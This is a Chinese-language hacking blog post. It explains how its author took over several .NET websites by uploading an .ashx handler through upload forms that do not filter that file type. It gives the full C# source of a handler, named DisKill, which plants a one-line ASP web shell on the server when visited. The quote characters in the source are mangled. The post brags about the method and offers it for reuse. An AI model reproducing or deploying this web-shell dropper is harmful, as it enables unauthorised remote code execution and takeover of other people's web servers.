这段代码相信大家看得懂吧,前几天拿几个.NET的站,在上传问题上,突然想起一年前黑阔们用的那个ashx,于是成功拿下shell。 本程序涉及 .NET程序及上传未过滤ashx格式的。
但是发现那个ashx代码扔掉了,当时只顾用,没注意代码, 于是百度看了下,其实原理很简单。然后自己简单的写了一个。 这是一个.NET的一般处理程序 可以在浏览器中像asp php aspx等脚本一样运行。只要能传上他,直接用IO类型生成一下就搞定了。
只要打开地址,即可生成。
上面的变量name是文件名,str变量是一句话,中间用转义符/ 分开 string str=]"; 一句话密码那儿是用引号的,用转义符隔开,不然会出问题。
这里name是调用上面的变量 获取物理路径,然后写入str。 其实很多过了很久的东西,用着依然好用。
源码 :
<%@ WebHandler Language=]C#] Class=]DisKill] %> using System; using System.Web; using System.IO; public class DisKill : IHttpHandler { public void ProcessRequest (HttpContext context) { context.Response.ContentType = [text/plain]; string name = [test. asp ]; string str=]<%eval request(\]DisKill\])%>]; try { StreamWriter sw = new StreamWriter(context.Server.MapPath(name)); sw.Write(str); sw.Flush(); sw.Close(); context.Response.Write([上传成功]); } catch (Exception) { context.Response.Write([上传失败]); } } public bool IsReusable { get { return false; } } }
查看更多关于一年前黑阔用的那个ashx上传详解 - 网站安全 - 自的详细内容...